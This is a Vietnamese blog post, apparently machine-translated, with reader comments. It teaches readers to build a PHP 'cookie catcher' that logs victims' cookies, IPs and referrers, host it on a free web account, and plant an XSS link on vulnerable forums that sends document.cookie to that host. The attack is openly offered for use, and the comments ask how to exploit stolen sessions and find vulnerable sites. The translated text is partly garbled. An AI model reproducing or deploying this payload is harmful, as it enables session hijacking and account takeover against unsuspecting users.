Cookie là gì?
Trước hết, chúng ta sẽ thấy những gì đang cookie.In Nói một cách đơn giản một cookie là một điều đặc biệt mà trình duyệt web của chúng tôi được sử dụng để lưu trữ thông tin của chúng tôi, chẳng hạn như tên người dùng người dùng, mật khẩu, vv
Giống như có bạn bao giờ nhận thấy khi chúng ta đăng nhập vào một số tài khoản như Facebook và nhấp chuột trên bất kỳ trang nào để mở nó trong tab mới thì tại sao chúng ta không có để đăng nhập vào tên người dùng của chúng tôi và again.Even mật khẩu nếu chúng ta đóng tài khoản Facebook của chúng tôi và một lần nữa mở nó vẫn không có nhu cầu để đăng nhập vào các thông tin của bạn một lần nữa, trừ khi bạn đăng nhập tài khoản của bạn.
Điều này được thực hiện bởi cookie browser.It của chúng tôi thực sự dễ dàng của chúng tôi, nhưng nghĩ rằng những gì sẽ xảy ra nếu cookie này có ăn cắp, sau đó ai đó có thể dễ dàng đăng nhập vào tài khoản của chúng tôi mà không cần biết mật khẩu.
Lấy cookie là gì?
Một công cụ lấy cookie là gì, nhưng chỉ cần một kịch bản php mà chụp cookie của trình duyệt của chúng tôi.
Hacker thường gửi cho bạn một mã hoặc liên kết và liên kết này được kết nối với các catcher cookie.
Khi ai đó nhấp chuột vào liên kết đó, bắt Cookie hoạt động và nắm bắt tất cả các cookie của nạn nhân vô tội và gửi cho hacker.
Làm thế nào để Thực hiện một Catcher Cookie?
Sao chép mã dưới đây và dán vào trong notepad:
Lưu notepad này với tên CookieCatcher.php<?php
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
fclose($fp);
header ("javascript:history.back()");?>
vậy là các bạn đã tạo ra 1 côn cụ get cookie rồi
Làm thế nào để sử dụng Catcher Cookie?
Bây giờ câu hỏi đặt ra làm thế nào chúng ta có thể sử dụng bắt cookie.
Trước hết tạo một tài khoản miễn phí trên 0fees.net
Sau khi tạo cpanel.0fees.net mở tài khoản và đăng nhập vào tài khoản của bạn
Bây giờ dưới Quản lý File, click vào Online File Manager.
Bây giờ htdocs mở và tải lên các tập tin CookieCatcher.php ở trong đó.
Bây giờ tải lên các mã dưới đây trong bất kỳ trang web mà là dễ bị tổn thương để XSS như làm một bài đăng trong một số diễn đàn.
Hãy chắc chắn rằng để thay đổi tên người dùng của người dùng.<a onclick="document.location='http://YOUR-USER-NAME.0fees.net/cookiecatcher.php?cookie='+escape(document.cookie) ;" href="#"> click here </a>
Sau khi gửi bài này sẽ xuất hiện như một liên kết và khi ai đó nhấp chuột vào liên kết đó, bắt Cookie sẽ tự động tạo một file Cookies.html tên trong cùng một thư mục trong tài khoản của bạn và các tập tin cookie của clicker rằng sẽ đến tập tin đó.
Thanks
KunGa
ai coppy vui lòng ghi rõ nguồn KunGa96.blogspot.com
lay duoc cookie ve roi minh lam sao de lay duoc thong tin cua nan nhan vay admin
Trả lờiXóaBây giờ tải lên các mã dưới đây trong bất kỳ trang web mà là dễ bị tổn thương để XSS như làm một bài đăng trong một số diễn đàn. làm tới đây rồi làm sao mình hk hỉu , chỉ mình vs
Trả lờiXóacái bloger bây giờ không in cookie cho mình nữa ak admin
Trả lờiXóaok thanks ad nhiều
Trả lờiXóaad có thể đưa ra 1 số trang bị lỗi xss ko
Trả lờiXóamất cookie có thể bị đánh cắp dữ liệ không?
Trả lờiXóa"khanh vang"